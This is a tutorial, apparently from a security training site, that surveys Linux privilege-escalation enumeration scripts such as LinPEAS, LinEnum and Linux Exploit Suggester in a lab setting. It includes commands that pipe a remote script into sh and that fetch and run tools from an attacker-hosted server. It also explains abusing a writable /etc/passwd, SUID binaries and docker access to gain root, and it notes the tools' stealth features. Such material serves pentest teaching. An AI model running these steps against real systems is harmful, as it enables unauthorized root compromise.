Linux Privilege Escala�on: Automated Script

1|Page
 Linux Privilege Escalation: Automated Script

Contents
Introduc�on ............................................................................................................................................ 3
Privilege Escala�on Vectors..................................................................................................................... 3
Ge�ng Access to Linux Machine ............................................................................................................ 3
LinPEAS .................................................................................................................................................... 4
SUID Checks: ................................................................................................................................... 6
LinEnum .................................................................................................................................................. 8
Kernel and distribu�on release details ............................................................................................... 9
Pla�orm/so�ware specific tests: .................................................................................................. 10
Bashark.................................................................................................................................................. 11
LES: Linux Exploit Suggester .................................................................................................................. 13
LinuxPrivChecker ................................................................................................................................... 15
Metasploit: Local_Exploit_Suggester .................................................................................................... 17
Linux Private-i ........................................................................................................................................ 18
Linux Smart Enumera�on...................................................................................................................... 20
Linux Exploit Suggester 2 ...................................................................................................................... 22
Conclusion ............................................................................................................................................. 23

2|Page
 Linux Privilege Escalation: Automated Script

Introduction
In this ar�cle, we will shed light on some of the Linux Privilege Escala�on automated scripts that can
be used to perform Post Exploita�on and Enumera�on a�er ge�ng ini�al accesses on Linux based
Devices.

When an atacker atacks a Linux Opera�ng System most of the �me they will get a base shell which
can be converted into a TTY shell or meterpreter session. This shell is limited in the ac�ons it can
perform. So, in order to elevate privileges, we need to enumerate different files, directories,
permissions, logs and /etc/passwd files. The number of files inside any Linux System is very
overwhelming. Hence, doing this task manually is very difficult even when you know where to look.
So, why not automate this task using scripts.

Basically, privilege escala�on is a phase that comes a�er the atacker has compromised the vic�m’s
machine where he tries to gather cri�cal informa�on related to systems such as hidden password
and weak configured services or applica�ons and etc. All this informa�on helps the atacker to make
the post exploit against the machine for ge�ng the higher-privileged shell.

Privilege Escalation Vectors

Following informa�on are considered as cri�cal Informa�on of Windows System:

• The version of the opera�ng system

• Any Vulnerable package installed or running
• Files and Folders with Full Control or Modify Access
• Mapped Drives
• Poten�ally Interes�ng Files
• Network Informa�on (interfaces, arp)
• Firewall Status and Rules
• Running Processes
• Stored Creden�als
• Sudo Rights
• Path Variables
• Docker
• Buffer Overflow condi�ons
• Cronjobs
• Capabili�es

Several scripts are used in penetra�on tes�ng to quickly iden�fy poten�al privilege escala�on vectors
on Linux systems, and today we will elaborate on each script that works smoothly.

Getting Access to Linux Machine

This step is for maintaining con�nuity and for beginners. If you are more of an intermediate or expert
then you can skip this and get onto the scripts directly. Or if you have got the session through any
other exploit then also you can skip this sec�on.

Since we are talking about the post-exploita�on or the scripts that can be used to enumerate the
condi�ons or opening to elevate privileges, we first need to exploit the machine. It is a rather prety
simple approach. Firstly, we cra� a payload using MSFvenom. Apart from the exploit, we will be

3|Page
 Linux Privilege Escalation: Automated Script

providing our local IP Address and a local port on which we are expec�ng to receive the session.
A�er successfully cra�ing the payload, we run a python one line to host the payload on our port 80.
We will use this to download the payload on the target system. A�er downloading the payload on
the system, we start a netcat listener on the local port that we men�oned while cra�ing the payload.
Then execute the payload on the target machine. You will get a session on the target machine.

Refer to our MSFvenom Ar�cle to Learn More.

LinPEAS
GitHub Link: LinPEAS

Let’s start with LinPEAS. It was created by Carlos P. The developers made it with a simple objec�ve to
enumerate all the possible ways or methods to Elevate Privileges on a Linux System. One of the best
things about LinPEAS is that it doesn’t have any dependency. This enables it to run anything that is
supported by the pre-exis�ng binaries. The team tested LinPEAS on Debian, CentOS, FreeBSD, and
OpenBSD. The developers designed LinPEAS in such a way that it won’t write anything directly to the
disk and while running on default, it won’t try to login as another user through the su command.

The amount of �me LinPEAS takes varies from 2 to 10 minutes depending on the number of checks
that are requested. If you are running WinPEAS inside a Capture the Flag Challenge then doesn’t shy
away from using the -a parameter. It will ac�vate all checks. LinPEAS monitors the processes in order
to find very frequent cron jobs but in order to do this you will need to add the -a parameter and this
check will write some info inside a file that will be deleted later. This makes it perfect as it is not
leaving a trace.

Let's talk about other parameters.

-s (superfast & stealth): This will bypass some �me-consuming checks and will leave absolutely no
trace.
-P (Password): Pass a password that will be used with sudo -l and Bruteforcing other users
-h Help Banner
-o Only execute selected checks
-d <IP/NETMASK> Discover hosts using fping or ping
ip <PORT(s)> -d <IP/NETMASK> Discover hosts looking for TCP open ports using nc

It exports and unset some environmental variables during the execu�on so no command executed
during the session will be saved in the history file and if you don’t want to use this func�onality just
add a -n parameter while exploi�ng it. LinPEAS can be executed directly from GitHub by using the
curl command.

curl [Link]
scripts-suite/master/linPEAS/[Link] | sh

4|Page
 Linux Privilege Escalation: Automated Script

Here, we can see the Generic Interes�ng Files Module of LinPEAS at work. Among other things, it
also enumerates and lists the writable files for the current user and group. Here we can see that the
Docker group has writable access. So, if we write a file by copying it to a temporary container and
then back to the target des�na�on on the host. We might be able to elevate privileges. It is possible
because some privileged users are wri�ng files outside a restricted file system.

Moving on we found that there is a python file by the name of [Link] inside the mnt directory. It
must have execu�on permissions as [Link] is usually linked with a cron job. So, we can enter a
shell invoca�on command

5|Page
 Linux Privilege Escalation: Automated Script

SUID Checks:
Set User ID is a type of permission that allows users to execute a file with the permissions of a
specified user. Those files which have SUID permissions run with higher privileges. Here, LinPEAS
have shown us that the target machine has SUID permissions on find, cp and nano.

LinPEAS also checks for various important files for write permissions as well. Here, we can see that
the target server has /etc/passwd file writable. This means that the atacker can create a user and
password hash on their device and then append that user into the /etc/passwd file with root access
and that have compromised the device to the root level.

6|Page
 Linux Privilege Escalation: Automated Script

Next detec�on happens for the sudo permissions. This means that the current user can use the
following commands with elevated access without a root password. This can enable the atacker to
refer these into the GTFOBIN and find a simple one line to get root on the target machine.

In the beginning, we run LinPEAS by taking the SSH of the target machine. In the beginning, we run
LinPEAS by taking the SSH of the target machine and then using the curl command to download and
run the LinPEAS script. But there might be situa�ons where it is not possible to follow those steps.
Hence, we will transfer the script using the combina�on of python one-liner on our atacker machine
and wget on our target machine.

ls
python -m SimpleHTTPServer 80

We downloaded the script inside the tmp directory as it has writen permissions. Also, we must
provide the proper permissions to the script in order to execute it.

cd /tmp
wget [Link]/[Link]
chmod 777 [Link]
./[Link]

7|Page
 Linux Privilege Escalation: Automated Script

LinEnum
GitHub Link: LinEnum

Time to take a look at LinEnum. It was created by Rebootuser. LinEnum is a shell script that works in
order to extract informa�on from the target machine about eleva�ng privileges. It supports an
Experimental Repor�ng func�onality that can help to export the result of the scan in a readable
report format. It has a few op�ons or parameters such as:

8|Page
 Linux Privilege Escalation: Automated Script

-k Enter keyword
-e Enter export loca�on
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays help text

It checks various resources or details men�oned below:

Kernel and distribution release details

System Informa�on:

Hostname, Networking details, Current IP, Default route details, DNS server informa�on

User Informa�on:

Current user details, Last logged on users, shows users logged onto the host, list all users including
uid/gid informa�on, List root accounts, Extract’s password policies and hash storage method
informa�on, checks umask value, checks if password hashes are stored in /etc/passwd, extract full
details for ‘default’ uid’s such as 0, 1000, 1001 etc., atempt to read restricted files i.e., /etc/shadow,
List current users history files (i.e. .bash_history, .nano_history etc.), Basic SSH checks

Privileged access:

Which users have recently used sudo, determine if /etc/sudoers is accessible, determine if the
current user has Sudo access without a password, are known ‘good’ breakout binaries available via
Sudo (i.e., nmap, vim etc.), Is root’s home directory accessible, List permissions for /home/

Environmental:

Display current $PATH, Displays env informa�on

Jobs/Tasks:

List all cron jobs, locate all world-writable cron jobs, locate cron jobs owned by other users of the
system, List the ac�ve and inac�ve systemd �mers

Services:

List network connec�ons (TCP & UDP), List running processes, Lookup and list process binaries and
associated permissions, List Netconf/indecent contents and associated binary file permissions, List
init.d binary permissions

Version Informa�on (of the following):

Sudo, MYSQL, Postgres, Apache (Checks user config, shows enabled modules, Checks for htpasswd
files, View www directories)

Default/Weak Creden�als:

Checks for default/weak Postgres accounts, Checks for default/weak MYSQL accounts

Searches:

Locate all SUID/GUID files, Locate all world-writable SUID/GUID files, Locate all SUID/GUID files
owned by root, Locate ‘interes�ng’ SUID/GUID files (i.e. nmap, vim etc.), Locate files with POSIX

9|Page
 Linux Privilege Escalation: Automated Script

capabili�es, List all world-writable files, Find/list all accessible *.plan files and display contents,
Find/list all accessible *.rhosts files and display contents, Show NFS server details, Locate *.conf and
*.log files containing keyword supplied at script run�me, List all *.conf files located in /etc, .bak file
search, Locate mail

Platform/software specific tests:

Checks to determine if we're in a Docker container checks to see if the host has Docker installed,
checks to determine if we're in an LXC container

Here, we are downloading the locally hosted LinEnum script and then execu�ng it a�er providing
appropriate permissions.

wget [Link]/[Link]
chmod 777 [Link]
./[Link]

We can see that it has enumerated for SUID bits on nano, cp and find.

When enumera�ng the Cron Jobs, it found the [Link] that we discussed earlier.

10 | P a g e
 Linux Privilege Escalation: Automated Script

It also checks for the groups with elevated accesses. In this case it is the docker group.

LinEnum also found that the /etc/passwd file is writable on the target machine.

Bashark
GitHub Link: Bashark

Time to surf with the Bashark. It was created by RedCode Labs. Bashark has been designed to assist
penetra�ons testers and security researchers for the post-exploita�on phase of their security
assessment of a Linux, OSX or Solaris Based Server.

Some of the prominent features of Bashark are that it is a bash script that means that it can be
directly run from the terminal without any installa�on. It is fast and doesn’t overload the target
machine. It does not have any specific dependencies that you would require to install in the wild. As
it wipes its presence a�er execu�on it is difficult to be detected a�er execu�on. Here, we
downloaded the Bashark using the wget command which is locally hosted on the atacker machine.
Then provided execu�on permissions using chmod and then run the Bashark script. It upgrades your
shell to be able to execute different commands.

cd /tmp
wget [Link]/[Link]
chmod 777 [Link]
source [Link]

11 | P a g e
 Linux Privilege Escalation: Automated Script

Here we used the getperm -c command to read the SUID bits on nano, cp and find among other
binaries. Bashark also enumerated all the common config files path using the getconf command.

getperm -c
getconf

12 | P a g e
 Linux Privilege Escalation: Automated Script

LES: Linux Exploit Suggester

GitHub Link: LES

Time to get sugges�ng with the LES. It was created by Z-Labs. As with other scripts in this ar�cle, the
developers also designed this tool to help the security testers or analysts test the Linux Machine for
poten�al vulnerabili�es and ways to elevate privileges. The creators cra�ed LES in such a way that it

13 | P a g e
 Linux Privilege Escalation: Automated Script

can work across different versions or flavours of Linux. Extensive research and improvements have
made the tool robust and with minimal false posi�ves.

The basic working of the LES starts with genera�ng the ini�al exploit list based on the detected
kernel version and then it checks for the specific tags for each exploit. It collects all the posi�ve
results and then ranks them according to the poten�al risk and then show it to the user. We can see
that the target machine is vulnerable to CVE 2021-3156, CVE 2018-18955, CVE 2019-18634, CVE,
2019-15666, CVE 2017-0358 and others. Now we can read about these vulnerabili�es and use them
to elevate privilege on the target machine.

chmod 777 [Link]

./[Link]

14 | P a g e
 Linux Privilege Escalation: Automated Script

LinuxPrivChecker
GitHub Link: LinuxPrivChecker

Checking some Privs with the LinuxPrivChecker. It was created by Mike Czumak and maintained by
Michael Con�no. Let's concentrate on a Python script a�er the collec�on of shell scripts. The Linux
system is the target of this Python script. It looks for relevant exploits, clear-text passwords, readable
files, and configura�on errors. Addi�onally, it highlights some intriguing places that can elevate
privileges and play a significant part. The basic system informa�on is presented first. The kernel
version, hostname, opera�ng system, network informa�on, running services, etc. are then displayed.

15 | P a g e
 Linux Privilege Escalation: Automated Script

python [Link]

LinuxPrivChecker also works to check the /etc/passwd/ file and other informa�on such as group
informa�on or write permissions on different files of poten�al interest.

16 | P a g e
 Linux Privilege Escalation: Automated Script

Metasploit: Local_Exploit_Suggester
In some cases, people who don’t like to get into scripts or those who use Metasploit to exploit the
target system end up with a meterpreter session. So, in these instances, we can use a post-
exploita�on module to check for ways to elevate privilege as other scripts. All it requires is the
session iden�fier number to run on the exploited target. It will list various vulnerabili�es that the
system is vulnerable to.

use post/multi/recon/local_exploit_suggester
set session 2
exploit

17 | P a g e
 Linux Privilege Escalation: Automated Script

Linux Private-i
GitHub Link: Linux Private-i

Checking some Privs with the LinuxPrivChecker. It was created by creosote. Linux Private-i can be
defined as a Linux Enumera�on or Privilege Escala�on tool that performs the basic enumera�on
steps and displays the results in an easily readable format. The script has a very verbose op�on that
includes vital checks such as OS info and permissions on common files, search for common
applica�ons while checking versions, file permissions and possible user creden�als, common apps:
Apache/HTTPD, Tomcat, Netcat, Perl, Ruby, Python, WordPress, Samba, Database Apps: SQLite,
Postgres, MySQL/MariaDB, MongoDB, Oracle, Redis, CouchDB, Mail Apps: Pos�ix, Dovecot, Exim,
Squirrel Mail, Cyrus, Sendmail, Courier, Checks Networking info - netstat, ifconfig, Basic mount info,
crontab and bash history.

Here's a snippet when running the Full Scope. This box has purposely misconfigured files and
permissions. We see that the target machine has the /etc/passwd file writable. We are also informed
that the Netcat, Perl, Python, etc. are installed on the target machine.

chmod 777 [Link]

./[Link]

18 | P a g e
 Linux Privilege Escalation: Automated Script

Private-i also extracted the script inside the cronjob that gets executed a�er the set dura�on of �me.

19 | P a g e
 Linux Privilege Escalation: Automated Script

Linux Smart Enumeration

GitHub Link: Linux Smart Enumera�on

Avoid using the stupid �me-tracking methods when using Linux Smart Enumera�on. Diego Blanco
was the one who created it. The LinEnum Script that we previously covered served as the model for
the Linux Smart Enumera�on script. Like all the other scripts stated, this one has the same goal. This
script provides three levels of verbosity so that the user can adjust how much informa�on they
display. It uses color to dis�nguish between different warning types; for example, green signals that
privileges on the target machine may be elevated. In order to verify the sudo privilege, it asks the
user if they know the password. It examines the Path Variables, Sudo Permissions, user groups, and
other per�nent files.

chmod 777 [Link]

./[Link]

20 | P a g e
 Linux Privilege Escalation: Automated Script

We can also see the [Link] file that gets re-executed again and again by the crontab.

SUID files such as nano, cp, find, etc., can elevate privilege. We can also see that someone can write
to the /etc/passwd file, which can create a high privilege user and then use it to log in to the target
machine.

21 | P a g e
 Linux Privilege Escalation: Automated Script

Linux Exploit Suggester 2

We discussed the Linux Exploit Suggester. However, now take a look at the Next-genera�on Linux
Exploit Suggester 2. It is heavily based on the first version. There have been some niche changes that
include more exploits, and it has an op�on to download the detected exploit code directly from
Exploit DB. It also offers more accurate wildcard matching and expands the scope of searchable
exploits. Last but not least, it supports Colored Output.

chmod 777 [Link]

./[Link] -k 3

22 | P a g e
 Linux Privilege Escalation: Automated Script

Conclusion
The point that we are trying to convey through this ar�cle is that there are mul�ple scripts and
executables and batch files to consider while doing Post Exploita�on on Linux-Based devices. We
wanted this ar�cle to serve as your go-to guide whenever you are trying to elevate privilege on a
Linux machine irrespec�ve of the way you got your ini�al foothold.

To Learn more about Privilege Escala�on. Follow this Link.

23 | P a g e
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

[Link]